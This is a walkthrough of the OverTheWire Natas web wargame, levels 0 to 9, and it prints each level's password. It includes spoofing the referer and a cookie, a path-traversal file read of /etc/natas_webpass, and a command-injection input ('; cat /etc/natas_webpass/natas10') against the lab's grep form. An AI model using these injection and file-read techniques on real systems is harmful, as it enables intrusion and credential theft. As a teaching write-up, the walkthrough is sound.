The Natas challenges are all web server related wargames provided by OverTheWire. OverTheWire has been around for quite some time and is a very good way to get introduced to CTFs and thinking in the way needed to solve these sorts of challenges.
The concept behind these wargames is that they get progressive harder as you move through the levels, requiring more and more research into common vulnerabilities in contrived cases.The start of the challenges can be found here: challenges. This post will cover natas levels 0 through 9 and my solutions to them.
- Part 2 can be found here which covers levels 10 through 14.
- Part 3 can be found here which covers levels 15 through 18.
- Part 4 can be found here which covers levels 19 through 24.
natas0
The first natas challenge can be found here: http://natas0.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas0
Pass: natas0
|
First thing to do is view the source of the page.
And real quick we’ve solved it by a “developer” leaving the password as a comment in the code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>
|
On to the next challenge.
natas1
Starting this off by going to: http://natas1.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas1
Pass: gtVrDuiDfck831PqWsLEZy5gyDz1clto
|
Same hint as last time, the password is somewhere in the page, however right clicking is disabled.
There’s a few different ways to solve this. First most web browsers allow someone to open up the Developer Tools regardless of what protections may be in place so the source can still be looked at.
However, will do this a different way since the page is fairly simple, using curl:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
$ curl -u natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.labs.overthewire.org/
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!
<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
</body>
</html>
|
natas2
Starting this off by going to: http://natas2.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas2
Pass: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
|
Well the hint says there’s nothing on the page. So that’s a bit odd. Using curl again to pull down the source.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ curl -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>
|
Curious, seems there is a pixel on the page. Opening the pixel gives a 1x1 pixel. Not too interesting. However, it may be possible that the “files/” directory is open for anyone to browse it and isn’t properly locked down.
Checking out: http://natas2.natas.labs.overthewire.org/files/ reveals that there’s a users.txt:
1
2
3
4
5
6
7
|
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH
|
natas3
Starting this off by going to: http://natas3.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas3
Pass: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
|
Again, with nothing on the page, source shows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas3", "pass": "sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14" };</script></head>
<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>
|
Well, knowing that Google is built on the ability to crawl through webpages with robots. Wonder if there’s something in the robots.txt file that could give some hints as to what the answer is.
Robots.txt:
1
2
|
User-agent: *
Disallow: /s3cr3t/
|
Looks like there’s another possible directory that could be browsed through, putting it all together:
1
|
http://natas3.natas.labs.overthewire.org/s3cr3t
|
And there’s a users.txt:
1
|
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
|
natas4
Starting this off by going to: http://natas4.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas4
Pass: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
|
Seems that the challenges are starting to ramp up in difficulty. There’s no opened directories here, nothing obvious in the source. Just a message stating it expects us to come from natas5 URL:
1
|
Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/index.php" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
|
The hint pretty clearly states what needs to be done: spoof our referring address. We should be able to leverage curl again to spoof our referring.
Details here about curl's referring from the man pages:
1
2
3
4
5
6
|
-e, --referer <URL>
(HTTP) Sends the "Referrer Page" information to the HTTP server. This can also be set with the -H, --header flag of course.
When used with -L, --location you can append ";auto" to the -e, --referer URL to make curl automatically set the previous URL when it follows a Location: header.
The ";auto" string can be used alone, even if you don't set an initial -e, --referer.
If this option is used several times, the last one will be used.
|
And putting it all together on the commandline:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
$ curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ -e http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org -v
* Rebuilt URL to: http://natas4.natas.labs.overthewire.org/
* Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas4.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas4'
> GET / HTTP/1.1
> Host: natas4.natas.labs.overthewire.org
> Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
> User-Agent: curl/7.54.0
> Accept: */*
> Referer: http://natas5.natas.labs.overthewire.org/
>
< HTTP/1.1 200 OK
< Date: Mon, 20 Jan 2020 05:38:03 GMT
< Server: Apache/2.4.10 (Debian)
< Vary: Accept-Encoding
< Content-Length: 962
< Content-Type: text/html; charset=UTF-8
<
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas4", "pass": "Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" };</script></head>
<body>
<h1>natas4</h1>
<div id="content">
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>
</html>
|
natas5
Starting this off by going to: http://natas5.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas5
Pass: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
|
“Access disallowed. You are not logged in”
Well, checking the source, nothing. Guessing from this point forth the password won’t be easily found in the source. Looking through it thought, there’s no obvious hints.
Time to poke around a bit more with the Developer Tools.
This time looking at traffic. Nothing interesting.
Time to check Storage, and see what cookies exist. Looks like there’s a cookie that checks to see if the user is logged in or not. Setting the value of loggedin from 0 to 1 and then refreshing the page.
Great success:
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
On to the next level.
natas6
Starting this off by going to: http://natas6.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas6
Pass: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
|
Greeted with a form that expects some sort of secret code and a button that allows for viewing the source. Looking at the source, let’s see what’s going on.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
Looks like the secret.inc seems like a good place to go poking around:
1
2
3
4
5
|
view-source:http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
|
Guessing the secret here is what the form needs, after inputting the secret:
1
|
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
|
natas7
Starting this off by going to: http://natas7.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas7
Pass: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
|
Two links to poke around, “Home” and “About”. Something interesting must be behind these links that will get the password to the next level. Clicking on the links changes this the URL:
1
|
http://natas7.natas.labs.overthewire.org/index.php?page=home
|
And looking at the source for the two pages both reveal a hint:
1
|
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
|
It may be possible to use the page= and give it any location wanted, this is possible since ultimately a webserver is just serving up content that is available in different directories located on a webserver:
1
|
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
|
And then the password is printed for us:
1
|
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
|
natas8
Starting this off by going to: http://natas8.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas8
Pass: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
|
Another form. This time looking at the source:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
Looks like the interesting thing here is the encodeSecret function.
1
2
3
4
5
|
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
|
Just need to reverse the order of operations here and then the secret should be revealed.
Two different ways to approach this, could write up some php and then run it, or just use some online tools to execute php functions.
First: hex2bin, followed by strrev, and then a base64_decode. That gives a secret, oubWYf2kBq.
And now for the password for the next challenge:
1
|
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
|
natas9
Starting this off by going to: http://natas9.natas.labs.overthewire.org/
Login info is:
1
2
|
User: natas9
Pass: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
|
Looking at the source:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
</pre>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
|
Looks like the interesting bit of code is here:
1
2
3
|
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
|
Doesn’t seems there’s any sanitizing of the input strings. It may be possible to have it execute arbitrary commands.
Trying with ;ls -al:
1
2
|
Output:
-rw-r----- 1 natas9 natas9 460878 Dec 15 2016 dictionary.txt
|
Looks like this can be exploited to execute any sort of command we’d like on the webserver. Time to find the password.
Using what we knew about the paths for the password for the previous challenge, it should be possible to explore the contents of /etc with: ; ls -al /etc/. Sure enough there’s a natas_webpass/. To get the password, just use ; cat /etc/natas_webpass/natas10 and move on to the net challenge:
1
|
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
|